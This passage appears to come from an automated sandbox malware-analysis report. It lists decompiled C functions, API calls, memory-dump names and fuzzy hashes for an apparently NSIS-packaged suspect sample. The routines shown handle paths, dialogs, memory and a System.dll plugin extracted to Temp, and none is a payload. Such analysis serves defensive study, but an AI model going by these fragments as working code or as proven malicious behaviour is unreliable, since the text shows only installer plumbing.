                                                                                        0x00404d4f
                                                                                        0x00404d54
                                                                                        0x00404d5c
                                                                                        0x00404d5d
                                                                                        0x00404d6a
                                                                                        0x00404d72
                                                                                        0x00404d73
                                                                                        0x00404d75
                                                                                        0x00404d77
                                                                                        0x00404d79
                                                                                        0x00404d7c
                                                                                        0x00404d7c
                                                                                        0x00404d83
                                                                                        0x00404d89
                                                                                        0x00404d89
                                                                                        0x00404d90
                                                                                        0x00404d97
                                                                                        0x00404d9a
                                                                                        0x00404d9d
                                                                                        0x00404d9d
                                                                                        0x00404da1
                                                                                        0x00404db1
                                                                                        0x00404db3
                                                                                        0x00404db6
                                                                                        0x00404d5f
                                                                                        0x00404d5f
                                                                                        0x00404d66
                                                                                        0x00404d66
                                                                                        0x00404dbe
                                                                                        0x00404dc9
                                                                                        0x00404ddf
                                                                                        0x00404df0
                                                                                        0x00404e0c

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                        • wsprintfW.USER32 ref: 00404DF0
                                                                                        • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s
                                                                                        • API String ID: 3540041739-3551169577
                                                                                        • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                        • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                        • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                        • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 58%
                                                                                        			E00405E0C(WCHAR* _a4) {
                                                                                        				WCHAR* _t9;
                                                                                        
                                                                                        				_t9 = _a4;
                                                                                        				_push( &(_t9[lstrlenW(_t9)]));
                                                                                        				_push(_t9);
                                                                                        				if( *(CharPrevW()) != 0x5c) {
                                                                                        					lstrcatW(_t9, 0x40a014);
                                                                                        				}
                                                                                        				return _t9;
                                                                                        			}




                                                                                        0x00405e0d
                                                                                        0x00405e1a
                                                                                        0x00405e1b
                                                                                        0x00405e26
                                                                                        0x00405e2e
                                                                                        0x00405e2e
                                                                                        0x00405e36

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 2659869361-3355392842
                                                                                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                        • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                        • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 91%
                                                                                        			E6FE010E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                                        				void* _v0;
                                                                                        				void* _t27;
                                                                                        				signed int _t29;
                                                                                        				void* _t30;
                                                                                        				void* _t34;
                                                                                        				void* _t36;
                                                                                        				void* _t38;
                                                                                        				void* _t40;
                                                                                        				void* _t48;
                                                                                        				void* _t54;
                                                                                        				void* _t63;
                                                                                        				void* _t64;
                                                                                        				signed int _t66;
                                                                                        				void* _t67;
                                                                                        				void* _t73;
                                                                                        				void* _t74;
                                                                                        				void* _t77;
                                                                                        				void* _t80;
                                                                                        				void _t81;
                                                                                        				void _t82;
                                                                                        				intOrPtr _t84;
                                                                                        				void* _t86;
                                                                                        				void* _t88;
                                                                                        
                                                                                        				 *0x6fe0506c = _a8;
                                                                                        				 *0x6fe05070 = _a16;
                                                                                        				 *0x6fe05074 = _a12;
                                                                                        				_a12( *0x6fe05048, E6FE01651, _t73);
                                                                                        				_t66 =  *0x6fe0506c +  *0x6fe0506c * 4 << 3;
                                                                                        				_t27 = E6FE012E3();
                                                                                        				_v0 = _t27;
                                                                                        				_t74 = _t27;
                                                                                        				if( *_t27 == 0) {
                                                                                        					L28:
                                                                                        					return GlobalFree(_t27);
                                                                                        				}
                                                                                        				do {
                                                                                        					_t29 =  *_t74 & 0x0000ffff;
                                                                                        					_t67 = 2;
                                                                                        					_t74 = _t74 + _t67;
                                                                                        					_t88 = _t29 - 0x66;
                                                                                        					if(_t88 > 0) {
                                                                                        						_t30 = _t29 - 0x6c;
                                                                                        						if(_t30 == 0) {
                                                                                        							L23:
                                                                                        							_t31 =  *0x6fe05040;
                                                                                        							if( *0x6fe05040 == 0) {
                                                                                        								goto L26;
                                                                                        							}
                                                                                        							E6FE01603( *0x6fe05074, _t31 + 4, _t66);
                                                                                        							_t34 =  *0x6fe05040;
                                                                                        							_t86 = _t86 + 0xc;
                                                                                        							 *0x6fe05040 =  *_t34;
                                                                                        							L25:
                                                                                        							GlobalFree(_t34);
                                                                                        							goto L26;
                                                                                        						}
                                                                                        						_t36 = _t30 - 4;
                                                                                        						if(_t36 == 0) {
                                                                                        							L13:
                                                                                        							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                        							_t74 = _t74 + _t67;
                                                                                        							_t34 = E6FE01312(E6FE0135A(_t38));
                                                                                        							L14:
                                                                                        							goto L25;
                                                                                        						}
                                                                                        						_t40 = _t36 - _t67;
                                                                                        						if(_t40 == 0) {
                                                                                        							L11:
                                                                                        							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                        							_t74 = _t74 + _t67;
                                                                                        							_t34 = E6FE01381(_t80, E6FE012E3());
                                                                                        							goto L14;
                                                                                        						}
                                                                                        						L8:
                                                                                        						if(_t40 == 1) {
                                                                                        							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                                        							_t10 = _t81 + 4; // 0x4
                                                                                        							E6FE01603(_t10,  *0x6fe05074, _t66);
                                                                                        							_t86 = _t86 + 0xc;
                                                                                        							 *_t81 =  *0x6fe05040;
                                                                                        							 *0x6fe05040 = _t81;
                                                                                        						}
                                                                                        						goto L26;
                                                                                        					}
                                                                                        					if(_t88 == 0) {
                                                                                        						_t48 =  *0x6fe05070;
                                                                                        						_t77 =  *_t48;
                                                                                        						 *_t48 =  *_t77;
                                                                                        						_t49 = _v0;
                                                                                        						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                                        						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                                        							E6FE01603(_t49, _t77 + 8, 0x38);
                                                                                        							_t86 = _t86 + 0xc;
                                                                                        						}
                                                                                        						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                                        						GlobalFree(_t77);
                                                                                        						goto L26;
                                                                                        					}
                                                                                        					_t54 = _t29 - 0x46;
                                                                                        					if(_t54 == 0) {
                                                                                        						_t82 = GlobalAlloc(0x40,  *0x6fe0506c +  *0x6fe0506c + 8);
                                                                                        						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                                        						_t14 = _t82 + 8; // 0x8
                                                                                        						E6FE01603(_t14, _v0, 0x38);
                                                                                        						_t86 = _t86 + 0xc;
                                                                                        						 *_t82 =  *( *0x6fe05070);
                                                                                        						 *( *0x6fe05070) = _t82;
                                                                                        						goto L26;
                                                                                        					}
                                                                                        					_t63 = _t54 - 6;
                                                                                        					if(_t63 == 0) {
                                                                                        						goto L23;
                                                                                        					}
                                                                                        					_t64 = _t63 - 4;
                                                                                        					if(_t64 == 0) {
                                                                                        						 *_t74 =  *_t74 + 0xa;
                                                                                        						goto L13;
                                                                                        					}
                                                                                        					_t40 = _t64 - _t67;
                                                                                        					if(_t40 == 0) {
                                                                                        						 *_t74 =  *_t74 + 0xa;
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					goto L8;
                                                                                        					L26:
                                                                                        				} while ( *_t74 != 0);
                                                                                        				_t27 = _v0;
                                                                                        				goto L28;
                                                                                        			}


























                                                                                        0x6fe010eb
                                                                                        0x6fe01100
                                                                                        0x6fe01109
                                                                                        0x6fe0110e
                                                                                        0x6fe01119
                                                                                        0x6fe0111c
                                                                                        0x6fe01125
                                                                                        0x6fe01129
                                                                                        0x6fe0112b
                                                                                        0x6fe012b0
                                                                                        0x6fe012ba
                                                                                        0x6fe012ba
                                                                                        0x6fe01132
                                                                                        0x6fe01132
                                                                                        0x6fe01137
                                                                                        0x6fe01138
                                                                                        0x6fe0113a
                                                                                        0x6fe0113d
                                                                                        0x6fe01256
                                                                                        0x6fe01259
                                                                                        0x6fe01271
                                                                                        0x6fe01271
                                                                                        0x6fe01278
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe01285
                                                                                        0x6fe0128a
                                                                                        0x6fe0128f
                                                                                        0x6fe01294
                                                                                        0x6fe0129a
                                                                                        0x6fe0129b
                                                                                        0x00000000
                                                                                        0x6fe0129b
                                                                                        0x6fe0125b
                                                                                        0x6fe0125e
                                                                                        0x6fe011bc
                                                                                        0x6fe011bf
                                                                                        0x6fe011c2
                                                                                        0x6fe011cb
                                                                                        0x6fe011d0
                                                                                        0x00000000
                                                                                        0x6fe011d1
                                                                                        0x6fe01264
                                                                                        0x6fe01266
                                                                                        0x6fe011a2
                                                                                        0x6fe011a5
                                                                                        0x6fe011a8
                                                                                        0x6fe011b1
                                                                                        0x00000000
                                                                                        0x6fe011b1
                                                                                        0x6fe01164
                                                                                        0x6fe01165
                                                                                        0x6fe01177
                                                                                        0x6fe01180
                                                                                        0x6fe01184
                                                                                        0x6fe0118e
                                                                                        0x6fe01191
                                                                                        0x6fe01193
                                                                                        0x6fe01193
                                                                                        0x00000000
                                                                                        0x6fe01165
                                                                                        0x6fe01143
                                                                                        0x6fe01218
                                                                                        0x6fe0121d
                                                                                        0x6fe01221
                                                                                        0x6fe01223
                                                                                        0x6fe0122c
                                                                                        0x6fe0122f
                                                                                        0x6fe01238
                                                                                        0x6fe0123d
                                                                                        0x6fe0123d
                                                                                        0x6fe01247
                                                                                        0x6fe0124a
                                                                                        0x00000000
                                                                                        0x6fe01250
                                                                                        0x6fe01149
                                                                                        0x6fe0114c
                                                                                        0x6fe011e9
                                                                                        0x6fe011ed
                                                                                        0x6fe011f7
                                                                                        0x6fe011fb
                                                                                        0x6fe01205
                                                                                        0x6fe0120a
                                                                                        0x6fe01211
                                                                                        0x00000000
                                                                                        0x6fe01211
                                                                                        0x6fe01152
                                                                                        0x6fe01155
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe0115b
                                                                                        0x6fe0115e
                                                                                        0x6fe011b8
                                                                                        0x00000000
                                                                                        0x6fe011b8
                                                                                        0x6fe01160
                                                                                        0x6fe01162
                                                                                        0x6fe0119e
                                                                                        0x00000000
                                                                                        0x6fe0119e
                                                                                        0x00000000
                                                                                        0x6fe012a1
                                                                                        0x6fe012a1
                                                                                        0x6fe012ab
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE01171
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE011E3
                                                                                        • GlobalFree.KERNEL32 ref: 6FE0124A
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE0129B
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE012B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        • Opcode ID: 048d0cd5fdbb0bb0a48851198daf8652261f5ff8f0dfe7924964b22cc85974cf
                                                                                        • Instruction ID: f0361abeec391a13440f060a89d5a2ab7a0ce7f0b48a24ea6ce92bc2e2028ca3
                                                                                        • Opcode Fuzzy Hash: 048d0cd5fdbb0bb0a48851198daf8652261f5ff8f0dfe7924964b22cc85974cf
                                                                                        • Instruction Fuzzy Hash: 51516EB5900706DFDB00EFA8C948A6A7FA9FB4632DB20411EF944DF350E739A9319B54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 92%
                                                                                        			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                        				signed int _t14;
                                                                                        				int _t17;
                                                                                        				void* _t24;
                                                                                        				intOrPtr* _t29;
                                                                                        				void* _t31;
                                                                                        				signed int _t32;
                                                                                        				void* _t35;
                                                                                        				void* _t40;
                                                                                        				signed int _t42;
                                                                                        
                                                                                        				_t29 = __edi;
                                                                                        				_t24 = __ebx;
                                                                                        				_t14 =  *(_t35 - 0x28);
                                                                                        				_t40 = __edx - 0x38;
                                                                                        				 *(_t35 - 0x10) = _t14;
                                                                                        				_t27 = 0 | _t40 == 0x00000000;
                                                                                        				_t32 = _t40 == 0;
                                                                                        				if(_t14 == __ebx) {
                                                                                        					if(__edx != 0x38) {
                                                                                        						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                                        					} else {
                                                                                        						E00402DA6(0x21);
                                                                                        						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nsiF917.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsiF917.tmp\System.dll", 0x400);
                                                                                        						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsiF917.tmp\System.dll");
                                                                                        					}
                                                                                        				} else {
                                                                                        					E00402D84(1);
                                                                                        					 *0x40adf0 = __ax;
                                                                                        					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                        				}
                                                                                        				 *(_t35 + 8) = _t17;
                                                                                        				if( *_t29 == _t24) {
                                                                                        					L13:
                                                                                        					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                        				} else {
                                                                                        					_t31 = E0040649D(_t27, _t29);
                                                                                        					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                                                        						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsiF917.tmp\System.dll",  *(_t35 + 8));
                                                                                        						_t42 = _t14;
                                                                                        						if(_t42 == 0) {
                                                                                        							goto L13;
                                                                                        						}
                                                                                        					} else {
                                                                                        						goto L13;
                                                                                        					}
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                        				return 0;
                                                                                        			}












                                                                                        0x0040263e
                                                                                        0x0040263e
                                                                                        0x0040263e
                                                                                        0x00402643
                                                                                        0x00402646
                                                                                        0x00402649
                                                                                        0x0040264e
                                                                                        0x00402650
                                                                                        0x00402670
                                                                                        0x004026aa
                                                                                        0x00402672
                                                                                        0x00402674
                                                                                        0x00402688
                                                                                        0x00402695
                                                                                        0x00402695
                                                                                        0x00402652
                                                                                        0x00402654
                                                                                        0x00402659
                                                                                        0x00402667
                                                                                        0x0040266a
                                                                                        0x004026af
                                                                                        0x004026b2
                                                                                        0x0040292e
                                                                                        0x0040292e
                                                                                        0x004026b8
                                                                                        0x004026c1
                                                                                        0x004026c3
                                                                                        0x004026e2
                                                                                        0x004015b4
                                                                                        0x004015b6
                                                                                        0x00000000
                                                                                        0x004015bc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004026c3
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll), ref: 00402695
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiF917.tmp$C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll
                                                                                        • API String ID: 1659193697-1147155294
                                                                                        • Opcode ID: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                                                                        • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                        • Opcode Fuzzy Hash: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                                                                        • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00403019(intOrPtr _a4) {
                                                                                        				long _t2;
                                                                                        				struct HWND__* _t3;
                                                                                        				struct HWND__* _t6;
                                                                                        
                                                                                        				if(_a4 == 0) {
                                                                                        					__eflags =  *0x42aa20; // 0x0
                                                                                        					if(__eflags == 0) {
                                                                                        						_t2 = GetTickCount();
                                                                                        						__eflags = _t2 -  *0x434f0c;
                                                                                        						if(_t2 >  *0x434f0c) {
                                                                                        							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                                                        							 *0x42aa20 = _t3;
                                                                                        							return ShowWindow(_t3, 5);
                                                                                        						}
                                                                                        						return _t2;
                                                                                        					} else {
                                                                                        						return E00406946(0);
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t6 =  *0x42aa20; // 0x0
                                                                                        					if(_t6 != 0) {
                                                                                        						_t6 = DestroyWindow(_t6);
                                                                                        					}
                                                                                        					 *0x42aa20 = 0;
                                                                                        					return _t6;
                                                                                        				}
                                                                                        			}






                                                                                        0x00403020
                                                                                        0x0040303a
                                                                                        0x00403040
                                                                                        0x0040304a
                                                                                        0x00403050
                                                                                        0x00403056
                                                                                        0x00403067
                                                                                        0x00403070
                                                                                        0x00000000
                                                                                        0x00403075
                                                                                        0x0040307c
                                                                                        0x00403042
                                                                                        0x00403049
                                                                                        0x00403049
                                                                                        0x00403022
                                                                                        0x00403022
                                                                                        0x00403029
                                                                                        0x0040302c
                                                                                        0x0040302c
                                                                                        0x00403032
                                                                                        0x00403039
                                                                                        0x00403039

                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                        • GetTickCount.KERNEL32 ref: 0040304A
                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                        • String ID:
                                                                                        • API String ID: 2102729457-0
                                                                                        • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                        • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                        • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                        • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 89%
                                                                                        			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                        				int _t15;
                                                                                        				long _t16;
                                                                                        
                                                                                        				_t15 = _a8;
                                                                                        				if(_t15 != 0x102) {
                                                                                        					if(_t15 != 0x200) {
                                                                                        						_t16 = _a16;
                                                                                        						L7:
                                                                                        						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                                                        							_push(_t16);
                                                                                        							_push(6);
                                                                                        							 *0x42d254 = _t16;
                                                                                        							E00404ED4();
                                                                                        						}
                                                                                        						L11:
                                                                                        						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                                                        					}
                                                                                        					if(IsWindowVisible(_a4) == 0) {
                                                                                        						L10:
                                                                                        						_t16 = _a16;
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					_t16 = E00404E54(_a4, 1);
                                                                                        					_t15 = 0x419;
                                                                                        					goto L7;
                                                                                        				}
                                                                                        				if(_a12 != 0x20) {
                                                                                        					goto L10;
                                                                                        				}
                                                                                        				E004044E5(0x413);
                                                                                        				return 0;
                                                                                        			}





                                                                                        0x00405517
                                                                                        0x00405521
                                                                                        0x0040553d
                                                                                        0x0040555f
                                                                                        0x00405562
                                                                                        0x00405568
                                                                                        0x00405572
                                                                                        0x00405573
                                                                                        0x00405575
                                                                                        0x0040557b
                                                                                        0x0040557b
                                                                                        0x00405585
                                                                                        0x00000000
                                                                                        0x00405593
                                                                                        0x0040554a
                                                                                        0x00405582
                                                                                        0x00405582
                                                                                        0x00000000
                                                                                        0x00405582
                                                                                        0x00405556
                                                                                        0x00405558
                                                                                        0x00000000
                                                                                        0x00405558
                                                                                        0x00405527
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040552e
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00405542
                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                          • Part of subcall function 004044E5: SendMessageW.USER32(00010432,00000000,00000000,00000000), ref: 004044F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                        • String ID:
                                                                                        • API String ID: 3748168415-3916222277
                                                                                        • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                        • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                        • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                        • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 90%
                                                                                        			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                        				int _v8;
                                                                                        				long _t21;
                                                                                        				long _t24;
